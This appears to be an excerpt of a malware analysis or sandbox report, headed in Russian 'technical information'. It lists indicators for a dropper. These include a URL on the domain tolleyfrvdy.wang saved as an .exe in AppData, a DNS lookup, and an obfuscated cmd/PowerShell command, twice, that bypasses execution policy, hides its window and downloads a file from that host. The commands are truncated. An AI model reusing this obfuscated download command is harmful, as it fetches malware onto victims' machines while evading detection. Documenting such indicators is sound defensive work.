Техническая информация
- http://tolleyfrvdy.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OW^ers^HelL.Exe -EX^e^C^UTiON^p^olI^C^Y byp^ASS -NOPR^O^F^iLe -^W^InD^Ow^ST^Y^le H^IdDen ^(^neW-OB^JeCt SYsTEM.neT.We^bclIEN^t).dOwnl^O^A^DfIle^('http://tolleyfrvdy.wang/search...
- DNS ASK to####frvdy.wang
- '<SYSTEM32>\cmd.exe' /c "p^OW^ers^HelL.Exe -EX^e^C^UTiON^p^olI^C^Y byp^ASS -NOPR^O^F^iLe -^W^InD^Ow^ST^Y^le H^IdDen ^(^neW-OB^JeCt SYsTEM.neT.We^bclIEN^t).dOwnl^O^A^DfIle^('http://tolleyfrvdy.wang/search...' (со скрытым окном)